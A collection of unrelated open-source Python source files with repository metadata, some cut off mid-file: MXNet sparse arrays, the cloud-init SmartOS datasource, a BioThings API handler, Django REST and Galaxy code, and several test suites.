url='https://github.com/cwilhelm/django-teams/wiki',
download_url='https://github.com/cwilhelm/django-teams/zipball/master',
package_dir={'teams': 'teams'},
packages=packages,
package_data={'teams': data_files},
classifiers=['Development Status :: 4 - Beta',
|
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities'],
)
|
madjam/mxnet
|
python/mxnet/ndarray/sparse.py
|
Python
|
apache-2.0
| 50,947
| 0.003199
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import, unused-wildcard-import, too-many-lines
"""Sparse NDArray API of MXNet."""
from __future__ import absolute_import
from __future__ import division
try:
from __builtin__ import slice as py_slice
from __builtin__ import sum as py_sum
except ImportError:
from builtins import slice as py_slice
from builtins import sum as py_sum
import ctypes
import warnings
from array import array as native_array
__all__ = ["_ndarray_cls", "csr_matrix", "row_sparse_array",
"BaseSparseNDArray", "CSRNDArray", "RowSparseNDArray"]
import numpy as np
from ..base import NotSupportedForSparseNDArray
from ..base import _LIB, numeric_types
from ..base import c_array_buf, mx_real_t, integer_types
from ..base import mx_uint, NDArrayHandle, check_call
from ..context import Context
from . import _internal
from . import op
try:
from .gen_sparse import * # pylint: disable=redefined-builtin
except ImportError:
pass
from ._internal import _set_ndarray_class
from .ndarray import NDArray, _storage_type, _DTYPE_NP_TO_MX, _DTYPE_MX_TO_NP
from .ndarray import _STORAGE_TYPE_STR_TO_ID, _STORAGE_TYPE_ROW_SPARSE, _STORAGE_TYPE_CSR
from .ndarray import _STORAGE_TYPE_UNDEFINED, _STORAGE_TYPE_DEFAULT
from .ndarray import zeros as _zeros_ndarray
from .ndarray import array as _array
try:
import scipy.sparse as spsp
except ImportError:
spsp = None
_STORAGE_AUX_TYPES = {
'row_sparse': [np.int64],
'csr': [np.int64, np.int64]
}
def _new_alloc_handle(stype, shape, ctx, delay_alloc, dtype, aux_types, aux_shapes=None):
"""Return a new handle with specified storage type, shape, dtype and context.
Empty handle is only used to hold results
Returns
-------
handle
A new empty ndarray handle
"""
hdl = NDArrayHandle()
for aux_t in aux_types:
if np.dtype(aux_t) != np.dtype("int64"):
raise NotImplementedError("only int64 is supported for aux types")
aux_type_ids = [int(_DTYPE_NP_TO_MX[np.dtype(aux_t).type]) for aux_t in aux_types]
aux_shapes = [(0,) for aux_t in aux_types] if aux_shapes is None else aux_shapes
aux_shape_lens = [len(aux_shape) for aux_shape in aux_shapes]
aux_shapes = py_sum(aux_shapes, ())
num_aux = mx_uint(len(aux_types))
check_call(_LIB.MXNDArrayCreateSparseEx(
ctypes.c_int(int(_STORAGE_TYPE_STR_TO_ID[stype])),
c_array_buf(mx_uint, native_array('I', shape)),
mx_uint(len(shape)),
ctypes.c_int(ctx.device_typeid),
ctypes.c_int(ctx.device_id),
ctypes.c_int(int(delay_alloc)),
ctypes.c_int(int(_DTYPE_NP_TO_MX[np.dtype(dtype).type])),
num_aux,
c_array_buf(ctypes.c_int, native_array('i', aux_type_ids)),
c_array_buf(mx_uint, native_array('I', aux_shape_lens)),
c_array_buf(mx_uint, native_array('I', aux_shapes)),
ctypes.byref(hdl)))
return hdl
class BaseSparseNDArray(NDArray):
"""The base class of an NDArray stored in a sparse storage format.
See CSRNDArray and RowSparseNDArray for more details.
"""
def __repr__(self):
"""Returns a string representation of the sparse array."""
shape_info = 'x'.join(['%d' % x for x in self.shape])
# The data content is not displayed since the array usually has big shape
return '\n<%s %s @%s>' % (self.__class__.__name__,
shape_info, self.context)
def __iadd__(self, other):
raise NotImplementedError()
def __isub__(self, other):
raise NotImplementedError()
def __imul__(self, other):
raise NotImplementedError()
def __idiv__(self, other):
raise NotImplementedError()
def __itruediv__(self, other):
raise NotImplementedError()
def _sync_copyfrom(self, source_array):
raise NotImplementedError()
def _at(self, idx):
raise NotSupportedForSparseNDArray(self._at, '[idx]', idx)
def _slice(self, start, stop):
raise NotSupportedForSparseNDArray(self._slice, None, start, stop)
def reshape(self, shape):
raise NotSupportedForSparseNDArray(self.reshape, None, shape)
@property
def size(self):
# the `size` for a sparse ndarray is ambiguous, hence disabled.
raise NotImplementedError()
def _aux_type(self, i):
"""Data-type of the array's ith aux data.
Returns
-------
numpy.dtype
This BaseSparseNDArray's aux data type.
"""
aux_type = ctypes.c_int()
check_call(_LIB.MXNDArrayGetAuxType(self.handle, i, ctypes.byref(aux_type)))
return _DTYPE_MX_TO_NP[aux_type.value]
@property
def _num_aux(self):
"""The number of aux data used to help store the sparse ndarray.
"""
return len(_STORAGE_AUX_TYPES[self.stype])
@property
def _aux_types(self):
"""The data types of the aux data for the BaseSparseNDArray.
"""
aux_types = []
num_aux = self._num_aux
for i in range(num_aux):
aux_types.append(self._aux_type(i))
return aux_types
def asnumpy(self):
"""Return a dense ``numpy.ndarray`` object with value copied from this array
"""
return self.tostype('default').asnumpy()
def astype(self, dtype):
"""Returns a copy of the array after casting to a specified type.
Parameters
----------
dtype : numpy.dtype or str
The type of the returned array.
Examples
--------
>>> x = mx.nd.sparse.zeros('row_sparse', (2,3), dtype='float32')
>>> y = x.astype('int32')
>>> y.dtype
<type 'numpy.int32'>
"""
res = zeros(shape=self.shape, ctx=self.context,
dtype=dtype, stype=self.stype)
self.copyto(res)
return res
def copyto(self, other):
"""Copies the value of this array to another array.
Parameters
----------
other : NDArray or CSRNDArray or RowSparseNDArray or Context
The destination array or context.
Returns
-------
|
NDArray or CSRNDArray or RowSparseNDArray
The copied array.
"""
if isinstance(other, NDArray):
if other.handle is
|
self.handle:
warnings.warn('You are attempting to copy an array to itself', RuntimeWarning)
return
return _internal._copyto(self, out=other)
elif isinstance(other, Context):
hret = _ndarray_cls(_new_alloc_handle(self.stype, self.shape, other,
True, self.dtype, self._aux_types))
return _internal._copyto(self, out=hret)
else:
raise TypeError('copyto does not support type ' + str(type(other)))
def check_format(self, full_check=True):
"""Check whether the NDArray format is valid.
Parameters
----------
full_check : bool, optional
If `True`, rigorous check, O(N) operations. Otherwise
basic check, O(1) operations (default True).
"""
check_call(_LIB.MXNDArraySyncCheckFormat(self.handle, ctypes.c_bool(full_check)))
def _data(self):
"""A deep copy NDArray of the data array associated with the BaseSparseNDArray.
Thi
|
prometheanfire/cloud-init
|
cloudinit/sources/DataSourceSmartOS.py
|
Python
|
gpl-3.0
| 29,325
| 0
|
# vi: ts=4 expandtab
#
# Copyright (C) 2013 Canonical Ltd.
#
# Author: Ben Howard <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Datasource for provisioning on SmartOS. This works on Joyent
# and public/private Clouds using SmartOS.
#
# SmartOS hosts use a serial console (/dev/ttyS1) on KVM Linux Guests
# The meta-data is transmitted via key/value pairs made by
# requests on the console. For example, to get the hostname, you
# would send "GET hostname" on /dev/ttyS1.
# For Linux Guests running in LX-Brand Zones on SmartOS hosts
# a socket (/native/.zonecontrol/metadata.sock) is used instead
# of a serial console.
#
# Certain behavio
|
r is defined by the DataDictionary
# http://us-east.manta.joyent.com/jmc/public/mdata/datadict.html
# Comments with "@datadictionary" are snippets of the definition
import base64
import binascii
im
|
port json
import os
import random
import re
import socket
from cloudinit import log as logging
from cloudinit import serial
from cloudinit import sources
from cloudinit import util
LOG = logging.getLogger(__name__)
SMARTOS_ATTRIB_MAP = {
# Cloud-init Key : (SmartOS Key, Strip line endings)
'instance-id': ('sdc:uuid', True),
'local-hostname': ('hostname', True),
'public-keys': ('root_authorized_keys', True),
'user-script': ('user-script', False),
'legacy-user-data': ('user-data', False),
'user-data': ('cloud-init:user-data', False),
'iptables_disable': ('iptables_disable', True),
'motd_sys_info': ('motd_sys_info', True),
'availability_zone': ('sdc:datacenter_name', True),
'vendor-data': ('sdc:vendor-data', False),
'operator-script': ('sdc:operator-script', False),
'hostname': ('sdc:hostname', True),
'dns_domain': ('sdc:dns_domain', True),
}
SMARTOS_ATTRIB_JSON = {
# Cloud-init Key : (SmartOS Key known JSON)
'network-data': 'sdc:nics',
'dns_servers': 'sdc:resolvers',
'routes': 'sdc:routes',
}
SMARTOS_ENV_LX_BRAND = "lx-brand"
SMARTOS_ENV_KVM = "kvm"
DS_NAME = 'SmartOS'
DS_CFG_PATH = ['datasource', DS_NAME]
NO_BASE64_DECODE = [
'iptables_disable',
'motd_sys_info',
'root_authorized_keys',
'sdc:datacenter_name',
'sdc:uuid'
'user-data',
'user-script',
]
METADATA_SOCKFILE = '/native/.zonecontrol/metadata.sock'
SERIAL_DEVICE = '/dev/ttyS1'
SERIAL_TIMEOUT = 60
# BUILT-IN DATASOURCE CONFIGURATION
# The following is the built-in configuration. If the values
# are not set via the system configuration, then these default
# will be used:
# serial_device: which serial device to use for the meta-data
# serial_timeout: how long to wait on the device
# no_base64_decode: values which are not base64 encoded and
# are fetched directly from SmartOS, not meta-data values
# base64_keys: meta-data keys that are delivered in base64
# base64_all: with the exclusion of no_base64_decode values,
# treat all meta-data as base64 encoded
# disk_setup: describes how to partition the ephemeral drive
# fs_setup: describes how to format the ephemeral drive
#
BUILTIN_DS_CONFIG = {
'serial_device': SERIAL_DEVICE,
'serial_timeout': SERIAL_TIMEOUT,
'metadata_sockfile': METADATA_SOCKFILE,
'no_base64_decode': NO_BASE64_DECODE,
'base64_keys': [],
'base64_all': False,
'disk_aliases': {'ephemeral0': '/dev/vdb'},
}
BUILTIN_CLOUD_CONFIG = {
'disk_setup': {
'ephemeral0': {'table_type': 'mbr',
'layout': False,
'overwrite': False}
},
'fs_setup': [{'label': 'ephemeral0',
'filesystem': 'ext3',
'device': 'ephemeral0'}],
}
# builtin vendor-data is a boothook that writes a script into
# /var/lib/cloud/scripts/per-boot. *That* script then handles
# executing the 'operator-script' and 'user-script' files
# that cloud-init writes into /var/lib/cloud/instance/data/
# if they exist.
#
# This is all very indirect, but its done like this so that at
# some point in the future, perhaps cloud-init wouldn't do it at
# all, but rather the vendor actually provide vendor-data that accomplished
# their desires. (That is the point of vendor-data).
#
# cloud-init does cheat a bit, and write the operator-script and user-script
# itself. It could have the vendor-script do that, but it seems better
# to not require the image to contain a tool (mdata-get) to read those
# keys when we have a perfectly good one inside cloud-init.
BUILTIN_VENDOR_DATA = """\
#cloud-boothook
#!/bin/sh
fname="%(per_boot_d)s/01_smartos_vendor_data.sh"
mkdir -p "${fname%%/*}"
cat > "$fname" <<"END_SCRIPT"
#!/bin/sh
##
# This file is written as part of the default vendor data for SmartOS.
# The SmartOS datasource writes the listed file from the listed metadata key
# sdc:operator-script -> %(operator_script)s
# user-script -> %(user_script)s
#
# You can view content with 'mdata-get <key>'
#
for script in "%(operator_script)s" "%(user_script)s"; do
[ -x "$script" ] || continue
echo "executing '$script'" 1>&2
"$script"
done
END_SCRIPT
chmod +x "$fname"
"""
# @datadictionary: this is legacy path for placing files from metadata
# per the SmartOS location. It is not preferable, but is done for
# legacy reasons
LEGACY_USER_D = "/var/db"
class DataSourceSmartOS(sources.DataSource):
_unset = "_unset"
smartos_type = _unset
md_client = _unset
def __init__(self, sys_cfg, distro, paths):
sources.DataSource.__init__(self, sys_cfg, distro, paths)
self.ds_cfg = util.mergemanydict([
self.ds_cfg,
util.get_cfg_by_path(sys_cfg, DS_CFG_PATH, {}),
BUILTIN_DS_CONFIG])
self.metadata = {}
self.network_data = None
self._network_config = None
self.script_base_d = os.path.join(self.paths.get_cpath("scripts"))
self._init()
def __str__(self):
root = sources.DataSource.__str__(self)
return "%s [client=%s]" % (root, self.md_client)
def _init(self):
if self.smartos_type == self._unset:
self.smartos_type = get_smartos_environ()
if self.smartos_type is None:
self.md_client = None
if self.md_client == self._unset:
self.md_client = jmc_client_factory(
smartos_type=self.smartos_type,
metadata_sockfile=self.ds_cfg['metadata_sockfile'],
serial_device=self.ds_cfg['serial_device'],
serial_timeout=self.ds_cfg['serial_timeout'])
def _set_provisioned(self):
'''Mark the instance provisioning state as successful.
When run in a zone, the host OS will look for /var/svc/provisioning
to be renamed as /var/svc/provision_success. This should be done
after meta-data is successfully retrieved and from this point
the host considers the provision of the zone to be a success and
keeps the zone running.
'''
LOG.debug('Instance provisioning state set as successful')
svc_path = '/var/svc'
if os.path.exists('/'.join([svc_path, 'provisioning'])):
os.rename('/'.join([svc_path, 'provisioning']),
'/'.join([svc_path, 'provision_success']))
def get_data(self):
self._init()
md = {}
ud = ""
if not self.smartos_type:
LOG.debug("Not running on smartos")
return False
if not self.md_client.exists():
LOG.debug("No metadata device '%r' found for SmartOS da
|
Star2Billing/cdr-stats
|
cdr_stats/apirest/view_user.py
|
Python
|
mpl-2.0
| 1,041
| 0.001921
|
#
# CDR-Stats License
# http://www.cdr-stats.org
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2015 Star2Billing S.L.
#
# The Initial Developer of the Original Code is
# Arezqui Belaid <[email protected]>
#
from django.contrib.auth.models im
|
port User
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.authentication import BasicAuthentication, SessionAuthentication
from rest_framework import viewsets
from apirest.user_serializers import UserSerializer
#from permissions import CustomObjectPermissions
class UserViewSet(viewsets.ReadOnlyModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
queryset
|
= User.objects.all()
serializer_class = UserSerializer
authentication = (BasicAuthentication, SessionAuthentication)
permission_classes = (IsAuthenticatedOrReadOnly, )
|
kevinxin90/biothings_explorer_jupyter_notebook
|
api_handler.py
|
Python
|
apache-2.0
| 7,479
| 0.00361
|
import requests
import json
import yaml
import pandas as pd
import pprint
from jsonld_processor import jsonld2nquads, fetchvalue
from utils import int2str
class SmartAPIHandler:
def __init__(self):
# description info about endpoint, bioentity and api
self.endpoint_info = {}
self.bioentity_info = {}
self.api_info = {}
self.parse_id_mapping()
self.parse_openapi()
self.relation = {}
def find_base(self, d, relation={}):
for k, v in d.items():
if isinstance(v, dict) and "@context" in v and "@base" in v["@context"]:
if v["@context"]["@base"] not in relation:
relation[v["@context"]["@base"]] = [v["@id"]]
elif v["@context"]["@base"] in relation and v["@id"] not in relation[v["@context"]["@base"]]:
relation[v["@context"]["@base"]].append(v["@id"])
elif isinstance(v, dict):
self.find_base(v,relation=relation)
return relation
'''
This function parse the jsonld file and return relation, output info
'''
def context2relation(self, context_url):
context = requests.get(context_url).json()
return self.find_base(context, relation={})
'''
This function parse the openapi yml file, and organize info into endpoints and apis
'''
def parse_openapi(self):
api_list_url = 'https://raw.githubusercontent.com/NCATS-Tangerine/translator-api-registry/kevin/API_LIST.yml'
api_li
|
st = yaml.load(requests.get(api_list_url).content)['APIs']
# path to fetch openapi yml file for each api
metadata_url_prefix = "https://raw.githubuserco
|
ntent.com/NCATS-Tangerine/translator-api-registry/kevin/"
for _api in api_list:
openapi_url = metadata_url_prefix + _api['metadata']
# check if the openapi file for the api exists first
if requests.get(openapi_url).status_code == 200:
# retrieve openapi file
openapi_file = requests.get(openapi_url).content
data = yaml.load(openapi_file)
self.api_info[data['info']['title']] = {'info': data['info'], 'servers': data['servers'], 'endpoints': []}
for _name, _info in data['paths'].items():
self.endpoint_info[data['servers'][0]['url'] + _name] = _info
_output = [_item['valueType'] for _item in _info['get']['responses']['200']['x-responseValueType']]
relation = {}
if 'x-JSONLDContext' in _info['get']['responses']['200']:
relation = self.context2relation(_info['get']['responses']['200']['x-JSONLDContext'])
for _op in _output:
if _op not in relation:
relation[_op] = ['ont:is_related_to']
self.endpoint_info[data['servers'][0]['url'] + _name].update({'output': _output, 'relation': relation})
self.api_info[data['info']['title']]['endpoints'].append(data['servers'][0]['url'] + _name)
else:
print("invalid url for openapi: {}".format(openapi_url))
'''
construct requests params/data, based on input type and value
only handle 'in' value which is body or query
'''
def api_call_constructor(self, uri, value, endpoint_name):
results = {}
method = type(value) == list and 'post' or 'get'
for _para in self.endpoint_info[endpoint_name][method]['parameters']:
# handle cases where input value is part of the url
if _para['in'] == 'path':
data = requests.get(endpoint_name.replace('{' + _para['name'] + '}', value))
return data
else:
# check whether the parameter is required
if _para['required']:
# if the para has a request template, then put value into the placeholder {{input}}
if 'x-requestTemplate' in _para:
for _template in _para['x-requestTemplate']:
if _template['valueType'] == 'default':
results[_para['name']] = _template['template'].replace('{{input}}', value)
elif uri == _template['valueType']:
results[_para['name']] = _template['template'].replace('{{input}}', value)
else:
results[_para['name']] = value
if type(value) != list:
data = requests.get(endpoint_name, params=results)
else:
data = requests.post(endpoint_name, data=results)
return data
'''
parse the uri_id mapping file, return a dict containing id mapping info indexed by uri
'''
def parse_id_mapping(self):
file_url = 'https://raw.githubusercontent.com/NCATS-Tangerine/translator-api-registry/kevin/ID_MAPPING.csv'
data = pd.read_csv(file_url, encoding = "ISO-8859-1")
for index, row in data.iterrows():
self.bioentity_info[row['URI']] = {'registry_identifier': row[2], 'alternative_names': row[3], 'description': row[4], 'identifier_pattern': row[5], 'preferred_name': row[1], 'type': row[6]}
return self.bioentity_info
'''
fetch endpoint jsonld contextinformation
'''
def fetch_context(self, endpoint_name):
file_url = self.endpoint_info[endpoint_name]['get']['responses']['200']['x-JSONLDContext']
return requests.get(file_url).json()
'''
input: user provide input/output
output: return endpoint(s) which could take the input and return the output
'''
def api_endpoint_locator(self, input, output):
endpoint_list = []
for _endpoint, _info in self.endpoint_info.items():
if input in _info['get']['parameters'][0]['x-valueType'] and output in _info['output']:
endpoint_list.append(_endpoint)
return endpoint_list
'''
make api calls based on input, endpoint
'''
def call_api(self, input, value, endpoint, output):
json_doc = self.api_call_constructor(input, value, endpoint).json()
int2str(json_doc)
if endpoint.startswith('http://myvariant.info/'):
if "_id" in json_doc:
json_doc["_id"] = json_doc["_id"].replace(':', '-')
elif "hits" in json_doc:
for _doc in json_doc["hits"]:
if "_id" in _doc:
_doc['_id'] = _doc['_id'].replace(":", "-")
output_type = self.bioentity_info[output]['type']
if output_type == 'Entity':
jsonld_context = self.fetch_context(endpoint)
json_doc.update(jsonld_context)
# parse output nquads
nquads = jsonld2nquads(json_doc)
outputs = list(set(fetchvalue(nquads, output)))
return (outputs,output_type)
else:
response = self.endpoint_info[endpoint]['get']['responses']['200']['x-responseValueType']
for _response in response:
if _response['valueType'] == output:
output_path = _response['path']
outputs_command = 'json_doc'
for _item in output_path.split('.'):
outputs_command += ('["' + _item + '"]')
outputs = eval(outputs_command)
return (outputs, output_type)
|
dbcls/dbcls-galaxy
|
test/functional/test_metadata_editing.py
|
Python
|
mit
| 2,489
| 0.023303
|
import galaxy.model
from galaxy.model.orm import *
from base.twilltestcase import TwillTestCase
class TestMetadataEdit( TwillTestCase ):
def test_00_metadata_edit( self ):
"""test_metadata_edit: Testing metadata editing"""
self
|
.logout()
self.login( email='[email protected]' )
self.new_history( name='Test Metadata Edit' )
global history1
history1 = galaxy.model.History.query() \
.order_by( desc( galax
|
y.model.History.table.c.create_time ) ).first()
self.upload_file( '1.bed' )
latest_hda = galaxy.model.HistoryDatasetAssociation.query() \
.order_by( desc( galaxy.model.HistoryDatasetAssociation.table.c.create_time ) ).first()
self.home()
# Due to twill not being able to handle the permissions forms, we'll eliminate
# DefaultHistoryPermissions prior to uploading a dataset so that the permission
# form will not be displayed on ted edit attributes page.
for dp in latest_hda.dataset.actions:
dp.delete()
dp.flush()
latest_hda.dataset.refresh()
self.check_history_for_string( '1.bed' )
self.check_metadata_for_string( '1.bed uploaded file unspecified (\?) chromCol value="1" selected endCol value="3" is_strandCol value="true" checked', hid=1 )
"""test editing attributes"""
self.edit_hda_attribute_info( hda_id=str( latest_hda.id ),
new_name='Testdata',
new_info="Uploaded my file",
new_dbkey='hg16',
new_startcol='6' )
self.check_metadata_for_string( 'Testdata bed Uploaded my file hg16 "bed" selected="yes" "startCol" value="6" selected', hid=1 )
"""test Auto-detecting attributes"""
self.auto_detect_metadata( hda_id=str( latest_hda.id ) )
self.check_metadata_for_string('Testdata bed Uploaded my file hg16 "bed" selected="yes" "startCol" value="2" selected', hid=1 )
"""test converting formats"""
self.convert_format( hda_id=str( latest_hda.id ), target_type='gff' )
self.check_metadata_for_string( '"gff" selected="yes"', hid=1 )
"""test changing data type"""
self.change_datatype( hda_id=str( latest_hda.id ), datatype='gff3' )
self.check_metadata_for_string( 'gff3', hid=1 )
self.delete_history( id=str( history1.id ) )
self.logout()
|
jmagnusson/Flask-Resize
|
tests/test_bin.py
|
Python
|
bsd-2-clause
| 2,759
| 0
|
import os
import subprocess
import pytest
import flask_resize
from .decorators import requires_redis, slow
@pytest.fixture
def env(tmpdir, redis_cache):
basedir = tmpdir
conffile = tmpdir.join('flask-resize-conf.py')
conffile.write(
"""
RESIZE_URL = 'https://example.com'
RESIZE_ROOT = '{root}'
RESIZE_REDIS_HOST = '{redis_host}'
RESIZE_REDIS_KEY = '{cache_key}'
"""
.format(
root=str(basedir).replace('\\', '\\\\'),
redis_host=redis_cache._host,
cache_key=redis_cache.key,
).strip()
)
env = os.environ.copy()
# env = dict(PATH=os.environ['PATH'])
env.update(FLASK_RESIZE_CONF=str(conffile))
return env
def run(env, *args):
return subprocess.check_output(args, env=env).decode().splitlines()
@slow
def test_bin
|
_usage(env):
assert 'usage: flask-resize' in run(env, 'flask-resize', '--help')[0]
@slow
def test_bin_list_images_empty(env):
assert run(env, 'flask-resize', 'list', 'images') == []
@slow
def test_bin_l
|
ist_has_images(
env,
resizetarget_opts,
image1_name,
image1_data,
image1_key
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
assert run(env, 'flask-resize', 'list', 'images') == [image1_key]
@requires_redis
@slow
def test_bin_list_cache_empty(env, redis_cache):
assert run(env, 'flask-resize', 'list', 'cache') == []
@requires_redis
@slow
def test_bin_list_has_cache(env, redis_cache):
redis_cache.add('hello')
redis_cache.add('buh-bye')
assert set(run(env, 'flask-resize', 'list', 'cache')) == \
{'hello', 'buh-bye'}
@slow
def test_bin_clear_images(
env,
resizetarget_opts,
image1_name,
image1_data
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
run(env, 'flask-resize', 'clear', 'images')
assert run(env, 'flask-resize', 'list', 'images') == []
@requires_redis
@slow
def test_bin_clear_cache(env, redis_cache):
redis_cache.add('foo bar')
assert run(env, 'flask-resize', 'clear', 'cache') == []
@requires_redis
@slow
def test_bin_sync_cache(
env,
resizetarget_opts,
image1_name,
image1_data,
image1_key,
redis_cache
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
redis_cache.clear()
assert run(env, 'flask-resize', 'list', 'cache') == []
run(env, 'flask-resize', 'sync', 'cache')
assert run(env, 'flask-resize', 'list', 'images') == [image1_key]
|
gsnbng/erpnext
|
erpnext/healthcare/doctype/therapy_session/therapy_session_dashboard.py
|
Python
|
agpl-3.0
| 226
| 0.044248
|
from __f
|
uture__ import unicode_literal
|
s
from frappe import _
def get_data():
return {
'fieldname': 'therapy_session',
'transactions': [
{
'label': _('Assessments'),
'items': ['Patient Assessment']
}
]
}
|
acampbell3000/clojure-imdb-parser
|
run.py
|
Python
|
apache-2.0
| 4,140
| 0.003623
|
#!/usr/bin/python
#
# Copyright 2012 Anthony Campbell (anthonycampbell.co.uk)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Required imports
import os, getopt, sys, re, subprocess, exceptions
# Constants
_default_output_file = "./output.txt"
_script_directory = os.path.dirname(os.path.realpath(__file__))
# Help
_help = """
Clojure IMDB Parser
__file__ [options]
Simple wrapper script for the Clojure IMDB parser.
Options:
-q --query Option which specifies the query text.
-f --file Option which writes the search result to the defailt output file: __default_output_file__
-o --output [path/to/file] If specified, writes the search result to the a file.
-v --verbose Option to enable verbose output.
-h -? --help Option to display this text.
Examples:
__file__ -q "Clash of the Titans" -o output.txt
__file__ --query "Clash of the Titans" --output output.txt
"""
_help = _help.replace("__file__", __file__)
_help = _help.replace("__default_output_file__", _default_output_file)
# Main method
def main():
# Initialise variables
verbose = False
output = ""
query_term = ""
output_file = ""
latest_jar = ""
try:
opts, args = getopt.getopt(sys.argv[1:], "q:fo:?hv", ["query=", "file", "output=", "help", "verbose"])
except getopt.GetoptError as error:
# Print help information and exit:
print "\n " + str(error)
print _help
sys.exit(2)
for option, argument in opts:
if option in ("-q", "--query"):
query_term = str(argument)
elif option in ("-f", "--file"):
output_file = _default_output_file
elif option in ("-o", "--output"):
output_file = str(argument)
elif option in ("-v", "--verbose"):
verbose = True
elif option in ("-h", "--help"):
print _help
sys.exit(0)
# Check we're good to go
if query_term == None or query_term == "":
print _help
sys.exit(2)
if verbose:
print "\n Clojure IMDB Parser"
try:
# Determine newest parser
process = subprocess.Popen(["ls -r " + _script_directory + "/release | grep \"clojure-imdb-parser.*.jar\" | head -n 1"],
stdout=subprocess.PIPE, shell=True)
latest_jar, stderr = process.communicate()
process.wait()
except exceptions.Exception as error:
print "\n Unable to find latest clojure-imdb-parser.jar:"
print "\n " + str(error)
sys.exit(1)
if latest_jar != None and str(latest_jar) != "":
latest_jar = _script_directory + "/release/" + str(latest_jar)
# Clean up path
pattern = re.compile(r'\n')
latest_jar = pattern.sub(" ", latest_jar).strip()
if verbose:
print "\n Latest clojure-
|
imdb-parser.jar:"
print "\n " + latest_jar + "\n"
try:
# Execute the parser
process = subprocess.Popen(["java", "-jar", latest_jar, query_term, output_file, str(verbose)],
stdout=subprocess.PIPE)
output, stderr = process.communicate()
|
process.wait()
except exceptions.Exception as error:
print "\n Unable to execute clojure-imdb-parser.jar!"
print "\n " + str(error)
sys.exit(1)
else:
print "\n Unable to find latest clojure-imdb-parser.jar!"
sys.exit(1)
# Where we at?
print output
# If we're being run directly
if __name__ == "__main__":
main()
|
SecureBrain/JEB-sample-scripts
|
AlertMarker.py
|
Python
|
mit
| 1,017
| 0.000983
|
# JEB sample script
# http://www.android-decompiler.com/
#
# AlertMarker.py
# Set(unset) alert marker to focued method.
#
# Copyright (c) 2013 SecureBrain
from jeb.api import IScript
from jeb.api.dex import Dex
from jeb.api.ui import View
import string
class AlertMarker(IScript):
def run(self, jeb):
self.jeb = jeb
self.dex = jeb.getDex()
self.ui = jeb.getUI()
success = self.start()
def start(self):
view = self.ui.getView(View.Type.ASSEMBLY)
msig = view.getCodePosition().getSignature()
md = self.dex.getMethodData(msig)
if not md:
print 'caret is not in method.'
return
f = md.getUserFlags()
print 'target:' + msig
if (f & Dex.FLAG_ALERT) == 0:
print 'set alert marker'
md.setUserFlags(f | Dex.FLAG_ALERT)
else:
|
print 'unset alert'
md.setUserFlags(f & ~De
|
x.FLAG_ALERT)
view.refresh()
|
AppEnlight/channelstream
|
tests/tests_views.py
|
Python
|
bsd-3-clause
| 21,292
| 0.00108
|
from gevent import monkey
monkey.patch_all()
import pytest
import gevent
import marshmallow
from channelstream.server_state import get_state
from channelstream.channel import Channel
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestConnectViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {}
try:
connect(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert exc.messages == {"username": ["Missing data for required field."]}
def test_good_json(self, dummy_request, test_uuids):
server_state = get_state()
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {
"username": "username",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
assert server_state.channels == {}
result = connect(dummy_request)
assert len(server_state.channels.keys()) == 2
assert "username" in server_state.users
assert test_uuids[1] in server_state.connections
assert result["channels"] == ["a", "aB"]
assert result["state"] == {"bar": "baz", "key": "foo"}
assert result["conn_id"] == test_uuids[1]
channels_info = result["channels_info"]["channels"]
assert len(channels_info.keys()) == 2
assert channels_info["a"]["total_users"] == 1
assert channels_info["a"]["total_connections"] == 1
assert channels_info["a"]["users"] == ["username"]
assert channels_info["a"]["history"] == []
assert result["channels_info"]["users"] == [
{"state": {"bar": "baz", "key": "foo"}, "user": "username"}
]
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestUserStateViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
dummy_request.json_body = {}
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
user_state(dummy_request)
